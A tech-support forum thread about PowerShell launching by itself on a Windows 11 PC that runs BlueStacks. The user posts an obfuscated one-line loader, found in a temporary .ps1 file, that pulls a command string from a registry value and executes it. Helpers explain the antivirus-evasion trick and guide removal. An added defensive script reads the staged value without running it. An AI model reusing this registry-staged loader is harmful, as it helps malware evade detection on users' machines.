Solved Powershell opening on its own


flhthemi

I use Bluestacks android emulator on my desktop PC. I like to sing so I use the StarMaker apk to karaoke online. It seems Starmaker will suddenly start getting laggy and it occurs right after I see a flash on my screen. Like that's when powershell opens. I'm NOT invoking it, but something is. I open Task manager and I can see it at the top of the list for memory usage.
I guess my question is does Win 11 require Powershell to run periodically as a maintenance thing and will it hurt to just use task manager to close it?
 
Windows Build/Version
22H2 OS Build 22621.1555 W/Explorer Patcher Current version

My Computer

System One

  • OS
    Windows 11 Pro
    Computer type
    PC/Desktop
    Manufacturer/Model
    N/A
    CPU
    AMD Phenom(tm) II X4 965 Processor 3.40 GHz
    Motherboard
    Gigabyte GA-770T USB3
    Memory
    12gb
    Graphics Card(s)
    Nvidia GTX950
    Sound Card
    Realtek 888
    Monitor(s) Displays
    Acer
    Screen Resolution
    1920x1080
    Hard Drives
    1TB SSD Vulcan Z
    Keyboard
    Logitech
    Internet Speed
    500
    Browser
    Firefox
    Antivirus
    Windows Defender
If you right-click on a Task manager, Processes tab column header you can add Command line as a column in order to see what PowerShell command or script is being run.
I'm not aware of any PowerShell maintenance tasks that might explain what you are seeing.


Best of luck,
Denis
 

My Computer

System One

  • OS
    Windows 11 Home x64 Version 23H2 Build 22631.3296
I'll give that a try next time I see PS running, thanks
 

PS.jpg
This is what's making things lag for me. I have no idea why PS starts on its own.
 

I suggest you browse to that folder
C:\Windows\System32\ED53.tmp
then make a copy of
ED54.tmp.ps1
then open a Notepad window and drop it onto there so you can read it without accidentally re-running it.
I'm only speculating but you might well find that that folder & that file only exist while you can see it running.

You might find something informative in it.
It looks suspicious to me.


Best of luck,
Denis
 

Here's what was in it....Got no idea other than it looks like some code. I did do an offline defender scan. Nothing found there.

Code:
$ZzBPIYVoqkZY=[ScriptBlock]; icm ($ZzBPIYVoqkZY::Create([string]::Join('', ((gp (([regex]::Matches('mFNx2Vonstxn_skcatSeulB\ERAWTFOS\:MLKH','.','RightToLeft') | ForEach {$_.value}) -join '')).'hZciikS' | % { [char]$_ }))))
 

This script is reading a reg key which has a command string inside, and executing it. It's an old trick, separating the actual commands from the script so your A/V has nothing to find.

Open RegEdit and look at HKLM\Software\Bluestacks_nxtsnoV2xNfm
 

My Computer

System One

  • OS
    Windows 7
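
One way to read the staged command string without executing it, and to list scheduled tasks that launch PowerShell: this is an added example, not code from any poster in this thread. The reversed path and value name are copied from the loader posted above; the function names, the output file and the task-matching heuristic are assumptions made for illustration.

```powershell
# Added example for analysis only: it reads and saves the staged text and never
# passes it to Invoke-Command, Invoke-Expression or [ScriptBlock]::Create.
function Get-StagedPayload {
    param(
        # Both literals are copied from the loader posted in the thread.
        [string]$ReversedPath = 'mFNx2Vonstxn_skcatSeulB\ERAWTFOS\:MLKH',
        [string]$ValueName    = 'hZciikS',
        # Hypothetical output location, chosen for this example.
        [string]$OutFile      = (Join-Path $env:TEMP 'staged-payload.txt')
    )
    # The loader hides the key path by storing it right-to-left; undo that.
    $chars = $ReversedPath.ToCharArray()
    [array]::Reverse($chars)
    $keyPath = -join $chars
    Write-Host "Loader reads: $keyPath -> $ValueName"

    if (-not (Test-Path -LiteralPath $keyPath)) {
        Write-Host 'Key not present (already removed, or a different key name on this machine).'
        return
    }
    $raw = (Get-ItemProperty -LiteralPath $keyPath -Name $ValueName -ErrorAction Stop).$ValueName

    # The loader casts every element to [char], so the value holds character codes.
    $text = -join ($raw | ForEach-Object { [char]$_ })
    Set-Content -LiteralPath $OutFile -Value $text -Encoding UTF8
    Write-Host "Saved $($text.Length) characters to $OutFile"
}

function Find-PowerShellTasks {
    # Heuristic (an assumption, the thread does not show the task itself):
    # list tasks whose action mentions PowerShell or a .ps1 file.
    Get-ScheduledTask | ForEach-Object {
        $cmd = ($_.Actions | ForEach-Object { "$($_.Execute) $($_.Arguments)" }) -join '; '
        if ($cmd -match 'powershell|\.ps1') {
            [pscustomobject]@{ TaskPath = $_.TaskPath; TaskName = $_.TaskName; Command = $cmd }
        }
    }
}

Get-StagedPayload
Find-PowerShellTasks | Format-List
```

Open the saved file in Notepad to read it; both functions only read the registry and the task list and change nothing on the machine.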
I was hoping that the code would identify its source [something like a line saying ### AMD Customisation script].

Its pattern matches the reported code in
Powershell windows popping up every day, just for a second. - MSAForum
where they say it is malware that no longer does anything because its domain was closed down.

The suggestion there is that you use MS SysInternals AutoRuns to stop it loading a scheduled task.
my list of AutoRuns links [post #16] - TenForums
my ditty - Notes about AutoRuns indicator colours [post #76] - TenForums


Best of luck,
Denis
 

I removed it from the task scheduler.
Sooo...delete the reg key too?
 

I would export a copy to understand what harm it's trying to do, then delete the key.
 

I feel certain it's BlueStacks tracking key clicks to see what ads I click on or something like that. I have used task manager to stop it when it starts and haven't seen any detrimental results to BlueStacks. Like I say, I removed the task (which was scheduled to run every 8 hours) and I will delete the registry entry. The worst it appears in doing that would be BlueStacks would start having issues and that's not a big deal. I know I'm going to have to keep an eye on Bluestacks when I update it too as it may rewrite to the task scheduler.

And thanks very much for the assistance!! You guys are great! I know I could never have figured this out.

EDIT I backed up the reg entry then deleted it. We'll see what happens....
 
